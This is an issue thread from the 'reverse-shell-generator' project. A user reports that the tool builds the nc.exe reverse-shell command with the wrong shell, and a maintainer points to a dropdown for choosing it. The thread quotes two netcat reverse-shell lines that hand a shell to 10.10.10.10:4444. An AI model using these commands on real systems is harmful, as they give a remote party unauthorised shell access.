reverse-shell-generator icon indicating copy to clipboard operation
reverse-shell-generator copied to clipboard

nc.exe wrong command

Open NotScortator opened this issue 3 years ago • 1 comments

When you try to generate a nc.exe revshell. the command input is sometimes wrong. For example, it will output nc.exe -e sh 10.10.10.10 4444 when it should be using nc.exe -e cmd.exe 10.10.10.10 4444.

NotScortator avatar Jun 24 '22 17:06 NotScortator

You can change the shell with dropdown options.

image

rohitkumarankam avatar Jul 02 '22 09:07 rohitkumarankam